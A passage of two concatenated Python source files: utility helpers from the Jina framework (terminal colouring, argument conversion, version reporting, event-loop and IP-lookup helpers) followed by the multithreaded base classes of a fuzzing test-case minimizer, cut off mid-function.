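#     '/home/user/log'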
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
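# Illustrative sketch of `colored` (escape codes shown literally; the text is
# returned unchanged when JINA_LOG_NO_COLOR is set):
#
#     >>> colored('ok', 'green', attrs='bold')
#     '\x1b[1m\x1b[32mok\x1b[0m'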
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
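# Usage sketch for `ColorContext`: everything printed inside the block is
# colored, and the color is reset on exit.
#
#     with ColorContext('cyan', bold=True):
#         print('progress message')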
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
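# Illustrative sketch (hypothetical keys) of the dict-to-CLI conversion done by
# `kwargs2list`: keys are kebab-cased, booleans become flags, dicts are JSON-encoded.
#
#     >>> ArgNamespace.kwargs2list({'log_level': 'INFO', 'daemon': True, 'env': {'k': 'v'}})
#     ['--log-level', 'INFO', '--daemon', '--env', '{"k": "v"}']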
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: the parsed namespace
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: a Namespace, or a dict whose values are Namespaces (or lists of Namespaces).
:return: the flattened pea args as a dict
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': zmq.pyzmq_version(),
'numpy': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
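# Usage sketch for `cached_property` (hypothetical class): the wrapped method
# runs once per instance, and the result is stored on the instance under a
# `CACHED_<name>` key.
#
#     class Expensive:
#         @cached_property
#         def data(self):
#             print('computing...')
#             return [1, 2, 3]
#
#     e = Expensive()
#     e.data  # prints 'computing...' and returns [1, 2, 3]
#     e.data  # returns the cached list without recomputing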
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
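# A couple of illustrative conversions (sample values) for `get_readable_time`;
# the arguments are forwarded to datetime.timedelta:
#
#     >>> get_readable_time(seconds=1000)
#     '16 minutes and 40 seconds'
#     >>> get_readable_time(days=1, seconds=5)
#     '1 day and 5 seconds'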
def get_internal_ip():
"""
Return the private IP address of the gateway, for connecting from other machines in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway, for connecting from other machines on the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warning::
Setting `timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using the magic command `get_ipython` that is only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
Calling asyncio.run directly will fail, because it cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# an event loop already exists
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an event loop running but are not using Jupyter/IPython; '
'this may mean you are using Jina with another integration. If so, you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize a string: strip it, replace spaces with underscores, and remove characters that are not alphanumerics, underscores, hyphens or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+\.ya?ml$'
return re.match(r, val.strip()) is not None
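# A few illustrative checks (sample paths) for `is_yaml_filepath`:
#
#     >>> is_yaml_filepath('flow.yml')
#     True
#     >>> is_yaml_filepath('config/my-exec.yaml')
#     True
#     >>> is_yaml_filepath('notes.txt')
#     False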
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
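# Usage sketch for `find_request_binding` (the class below is hypothetical;
# `requests` is the Jina request decorator):
#
#     class MyExec:
#         @requests(on='/index')
#         def index(self, **kwargs):
#             pass
#
#     find_request_binding(MyExec)  # -> {'/index': 'index'}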
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referenced as 'a__b'
:param _dict: (dict, list, struct or object) which we want to index into
:param key: (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
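# Illustrative sketch (sample data) of dunder-key resolution on plain Python
# containers; integer parts index into sequences:
#
#     >>> dunder_get({'a': {'b': [10, 20]}}, 'a__b__1')
#     20
#     >>> dunder_get({'tags': {'x': 1}}, 'tags__x')
#     1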
if False:  # typing-only guard so fastapi is not a hard runtime dependency
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
minimizer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for other minimizers."""
from __future__ import absolute_import
from builtins import object
from builtins import range
from future import standard_library
standard_library.install_aliases()
from metrics import logs
import copy
import functools
import os
import tempfile
import threading
import time
from . import errors
DEFAULT_CLEANUP_INTERVAL = 20
DEFAULT_THREAD_COUNT = 8
DEFAULT_TESTS_PER_THREAD = 4
MAX_MERGE_BATCH_SIZE = 32
PROGRESS_REPORT_INTERVAL = 300
class DummyLock(object):
"""Dummy to replace threading.Lock for single-threaded tests."""
def __enter__(self):
pass
def __exit__(self, exec_type, value, traceback):
pass
def __bool__(self):
return False
class TestQueue(object):
"""Queue to store commands that should be executed to test hypotheses."""
def __init__(self,
thread_count,
deadline_check=None,
progress_report_function=None,
per_thread_cleanup_function=None):
self.thread_count = thread_count
self.deadline_check = deadline_check
self.progress_report_function = progress_report_function
self.per_thread_cleanup_function = per_thread_cleanup_function
self.lock = threading.Lock()
self.queue = []
def _pop(self):
"""Pull a single hypothesis to process from the queue."""
with self.lock:
if not self.queue:
return None
return self.queue.pop(0)
def _work(self):
"""Process items from the queue until it is empty."""
while not self.deadline_check or not self.deadline_check(soft_check=True):
current_item = self._pop()
if not current_item:
break
test, test_function, completion_callback, should_run = current_item # pylint: disable=unpacking-non-sequence
if not should_run():
continue
result = test_function(test)
completion_callback(result)
if self.per_thread_cleanup_function:
self.per_thread_cleanup_function()
# Abort if we have exceeded the deadline for this operation.
if self.deadline_check and self.deadline_check(soft_check=True):
break
def _cleanup(self):
"""Clean up the queue to be sure that no more tasks will be executed."""
with self.lock:
self.queue = []
def push(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Add a test to the queue and a callback to run on completion."""
with self.lock:
self.queue.append((test, test_function, completion_callback, should_run))
def force(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Force a test to the front of the queue."""
entry = (test, test_function, completion_callback, should_run)
with self.lock:
self.queue.insert(0, entry)
def size(self):
"""Return the number of unprocessed tasks in the queue."""
return len(self.queue)
def process(self):
"""Process all tests in the queue and block until completion."""
while self.queue:
threads = [
threading.Thread(target=self._work) for _ in range(self.thread_count)
]
for thread in threads:
thread.start()
while any([thread.is_alive() for thread in threads]):
if self.deadline_check:
self.deadline_check(cleanup_function=self._cleanup)
if self.progress_report_function:
self.progress_report_function()
time.sleep(1)
class Testcase(object):
"""Single test case to be minimized."""
def __init__(self, data, minimizer):
self.minimizer = minimizer
if minimizer.tokenize:
try:
self.tokens = minimizer.tokenizer(data)
except UnicodeDecodeError:
raise errors.AntlrDecodeError
else:
self.tokens = data
self.required_tokens = [True] * len(self.tokens)
self.tested_hypotheses = set()
self.unmerged_failing_hypotheses = []
self.tests_to_queue = []
self.currently_processing = False
self.last_progress_report_time = 0
self.runs_since_last_cleanup = 0
self.runs_executed = 0
if minimizer.max_threads > 1:
self.test_queue = TestQueue(
minimizer.max_threads,
deadline_check=self._deadline_exceeded,
progress_report_function=self._report_progress)
self.merge_preparation_lock = threading.Lock()
self.merge_lock = threading.Lock()
self.cache_lock = threading.Lock()
self.tests_to_queue_lock = threading.Lock()
else:
self.test_queue = None
self.merge_preparation_lock = DummyLock()
self.merge_lock = DummyLock()
self.cache_lock = DummyLock()
self.tests_to_queue_lock = DummyLock()
def get_current_testcase_data(self):
"""Return the current test case data."""
return self.minimizer.token_combiner(self.get_required_tokens())
# Helper functions based on minimizer configuration.
def _deadline_exceeded(self, cleanup_function=None, soft_check=False):
"""Check to see if we have exceeded the deadline for execution."""
if self.minimizer.deadline and time.time() > self.minimizer.deadline:
if soft_check:
return True
# If we are here, we have exceeded the deadline on a hard check. Clean up.
if cleanup_function:
cleanup_function()
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Raise an exception if this is not a soft deadline check.
raise errors.MinimizationDeadlineExceededError(self)
return False
def _delete_file_if_needed(self, input_file):
"""Deletes a temporary file if necessary."""
# If we are not running in a mode where we need to delete files, do nothing.
if not self.minimizer.tokenize or not self.minimizer.delete_temp_files:
return
try:
os.remove(input_file)
except OSError:
pass
def _report_progress(self, is_final_progress_report=False):
"""Call a function to report progress if the minimizer uses one."""
if not self.minimizer.progress_report_function:
return
if (time.time() - self.last_progress_report_time < PROGRESS_REPORT_INTERVAL
and not is_final_progress_report):
return
self.last_progress_report_time = time.time()
message = '%d/%d tokens remaining. %d runs executed so far.' % (len(
self.get_required_tokens()), len(
self.required_tokens), self.runs_executed)
if is_final_progress_report:
message = "Done with this round of minimization. " + message
self.minimizer.progress_report_function(message)
# Functions used when preparing tests.
def _range_complement(self, current_range):
"""Return required tokens in the complement of the specified range."""
result = list(range(len(self.tokens)))
to_remove = set(current_range)
return [i for i in result if i not in to_remove and self.required_tokens[i]]
def _prepare_test_input(self, tokens, tested_tokens):
"""Write the tokens currently being tested to a temporary file."""
tested_tokens = set(tested_tokens)
current_tokens = [t for i, t in enumerate(tokens) if i in tested_tokens]
if not self.minimizer.tokenize:
return current_tokens
data = self.minimizer.token_combiner(current_tokens)
handle = self.minimizer.get_temp_file()
destination = handle.name
try:
handle.write(data)
except IOError:
# We may have filled the disk. Try processing tests and writing again.
self._do_single_pass_process()
handle.write(data)
handle.close()
return destination
def _get_test_file(self, hypothesis):
"""Return a test file for a hypothesis."""
complement = self._range_complement(hypothesis)
return self._prepare_test_input(self.tokens, complement)
def _push_test_to_queue(self, hypothesis):
"""Add a test for a hypothesis to a queue for processing."""
test_file = self._get_test_file(hypothesis)
callback = functools.partial(
self._handle_completed_test,
hypothesis=hypothesis,
input_file=test_file)
should_run = functools.partial(self._contains_required_tokens, hypothesis,
test_file)
self.test_queue.push(
test_file,
self.minimizer.test_function,
callback,
should_run=should_run)
# Make sure that we do not let too many unprocessed tests build up.
if self.test_queue.size() >= self.minimizer.batch_size:
self._do_single_pass_process()
def prepare_test(self, hypothesis):
"""Prepare the test based on the mode we are running in."""
# Check the cache to make sure we have not tested this before.
if self._has_tested(hypothesis):
return
self.runs_executed += 1
# If we are single-threaded, just run and process results immediately.
if not self.test_queue:
# In the threaded case, we call the cleanup function before each pass
# over the queue. It needs to be tracked here for the single-thread case.
self.runs_since_last_cleanup += 1
if (self.runs_since_last_cleanup >=
self.minimizer.single_thread_cleanup_interval and
self.minimizer.cleanup_function):
self.minimizer.cleanup_function()
test_file = self._get_test_file(hypothesis)
if self._contains_required_tokens(hypothesis, test_file):
self._handle_completed_test(
self.minimizer.test_function(test_file), hypothesis, test_file)
# Check to see if we have exceeded the deadline and report progress.
self._report_progress()
self._deadline_exceeded()
return
if self.currently_processing:
# If we are processing, we cannot write more tests or add to the queue.
with self.tests_to_queue_lock:
self.tests_to_queue.append(hypothesis)
else:
self._push_test_to_queue(hypothesis)
# Functions used when processing test results.
def _handle_completed_test(self, test_passed, hypothesis, input_file):
"""Update state based on the test result and hypothesis."""
# If the test failed, handle the result.
if not test_passed:
self._handle_failing_hypothesis(hypothesis)
# Delete leftover files if necessary.
self._delete_file_if_needed(input_file)
# Minimizers may need to do something with the test result.
self._process_test_result(test_passed, hypothesis)
def _process_test_result(self, test_passed, hypothesis):
"""Additional processing of the result. Minimizers may override this."""
def _handle_failing_hypothesis(self, hypothesis):
"""Update the token list for a failing hypothesis."""
if not self.test_queue:
# We aren't multithreaded, so just update the list directly.
for token in hypothesis:
self.required_tokens[token] = False
return
with self.merge_preparation_lock:
self.unmerged_failing_hypotheses.append(hypothesis)
if len(self.unmerged_failing_hypotheses) < MAX_MERGE_BATCH_SIZE:
return
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
# We may need to block while the previous batch is merging. If not, the
# results from this batch could conflict with the results from the previous.
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
def _attempt_merge(self, hypotheses, sibling_merge_succeeded=False):
"""Update the required token list if the queued changes don't conflict."""
# If there's nothing to merge, we're done.
if not hypotheses:
return
aggregate_tokens = set()
for hypothesis in hypotheses:
for token in hypothesis:
aggregate_tokens.add(token)
aggregate_hypothesis = list(aggregate_tokens)
if sibling_merge_succeeded:
# We were able to remove all tokens from the other half of this
# hypothesis, so we can assume that this would fail without running the
# test. If this would also pass, there would not have been a conflict
# while testing this set. Well, this could be a flaky test, but then we
# have bigger problems.
test_passed = True
else:
complement = self._range_complement(aggregate_hypothesis)
test_file = self._prepare_test_input(self.tokens, complement)
test_passed = self.minimizer.test_function(test_file)
self._delete_file_if_needed(test_file)
# Failed (crashed), so there was no conflict here.
if not test_passed:
for token in aggregate_hypothesis:
self.required_tokens[token] = False
return
# Passed (no crash). We need to try a bit harder to resolve this conflict.
if len(hypotheses) == 1:
# We really cannot remove this token. No additional work to be done.
return
middle = len(hypotheses) // 2
front = hypotheses[:middle]
back = hypotheses[middle:]
# If we could remove either one of two hypotheses, favor removing the first.
# FIXME: Fix this. Tracked in #1845.
# pylint: disable=assignment-from-none
front_merged_successfully = self._attempt_merge(front)
self._attempt_merge(back, sibling_merge_succeeded=front_merged_successfully)
def _do_single_pass_process(self):
"""Process through a single pass of our test queue."""
self.currently_processing = True
self.test_queue.process()
# If a cleanup function is provided, call it. This is usually used to
# ensure that all processes are terminated or perform additional cleanup.
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Push any results generated while this test was running to the queue.
self.currently_processing = False
while self.tests_to_queue:
with self.tests_to_queue_lock:
hypothesis = self.tests_to_queue.pop(0)
# This may trigger another round of processing, so don't hold the lock.
self._push_test_to_queue(hypothesis)
def process(self):
"""Start a test."""
if not self.test_queue:
return
while self.test_queue.size():
self._do_single_pass_process()
with self.merge_preparation_lock:
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
# Cache functions.
def _contains_required_tokens(self, hypothesis, test_file):
"""Check to see if this hypothesis contains untested tokens."""
# It is possible that we could copy this while it is being updated. We do
# not block in this case because the worst case scenario is that we run an
# irrelevant test, and blocking is potentially expensive.
working_required_tokens = copy.copy(self.required_tokens)
with self.merge_preparation_lock:
# A deep copy is not required. Hypotheses are not modified after being
# added to the list for processing.
unprocessed_hypotheses = copy.copy(self.unmerged_failing_hypotheses)
for unprocessed_hypothesis in unprocessed_hypotheses:
for token in unprocessed_hypothesis:
# For this check, we do not care if the merge would succeed or not since
# the best case is that we would add the token to the queue as well.
working_required_tokens[token] = False
for token in hypothesis:
if working_required_tokens[token]:
return True
# If we aren't going to run this test, this will not have a completion
# callback. If that happens, we need to clean up now.
self._delete_file_if_needed(test_file)
return False
def _has_tested(self, hypothesis):
"""Check to see if this hypothesis has been tested before."""
hypothesis_tuple = tuple(hypothesis)
with self.cache_lock:
if hypothesis_tuple in self.tested_hypotheses:
return True
self.tested_hypotheses.add(hypothesis_tuple)
return False
# Result checking functions.
def get_result(self):
"""Get the result of minimization."""
# Done with minimization, output log one more time
self._report_progress(is_final_progress_report=True)
if not self.minimizer.tokenize:
return self.get_required_tokens()
return self.get_current_testcase_data()
def get_required_tokens(self):
"""Return all required tokens for this test case."""
return [t for i, t in enumerate(self.tokens) if self.required_tokens[i]]
def get_required_token_indices(self):
"""Get the indices of all remaining required tokens."""
return [i for i, v in enumerate(self.required_tokens) if v]
def _default_tokenizer(s):
"""Default string tokenizer which splits on newlines."""
return s.split(b'\n')
def _default_combiner(tokens):
"""Default token combiner which assumes each token is a line."""
return b'\n'.join(tokens)
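# A minimal sketch of the default tokenizer/combiner pair: a test case is split
# into byte lines and re-joined with newlines, so dropping a "token" removes a
# whole line from the candidate test case.
#
#     >>> _default_tokenizer(b'a\nb\nc')
#     [b'a', b'b', b'c']
#     >>> _default_combiner([b'a', b'c'])
#     b'a\nc'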
class Minimizer(object):
"""Base class for minimizers."""
def __init__(self,
test_function,
max_threads=1,
tokenizer=_default_tokenizer,
token_combiner=_default_combiner,
tokenize=True,
cleanup_function=None,
single_thread_cleanup_interval=DEFAULT_CLEANUP_INTERVAL,
deadline=None,
get_temp_file=None,
delete_temp_files=True,
batch_size=None,
progress_report_function=None,
file_extension=''):
"""Initialize a minimizer. A minimizer object can be used multiple times."""
self.test_function = test_function
self.max_threads = max_threads
self.tokenizer = tokenizer
self.token_combiner = token_combiner
self.tokenize = tokenize
self.cleanup_function = cleanup_function
self.single_thread_cleanup_interval = single_thread_cleanup_interval
self.deadline = deadline
self.get_temp_file = get_temp_file
self.delete_temp_files = delete_temp_files
self.progress_report_function = progress_report_function
if batch_size:
self.batch_size = batch_size
else:
self.batch_size = DEFAULT_TESTS_PER_THREAD * max_threads
if not get_temp_file:
self.get_temp_file = functools.partial(
tempfile.NamedTemporaryFile,
mode='wb',
delete=False,
prefix='min_',
suffix=file_extension)
else:
self.get_temp_file = get_temp_file
@staticmethod
def _handle_constructor_argument(key, kwargs, default=None):
"""Cleanup a keyword argument specific to a subclass and get the value."""
result = default
try:
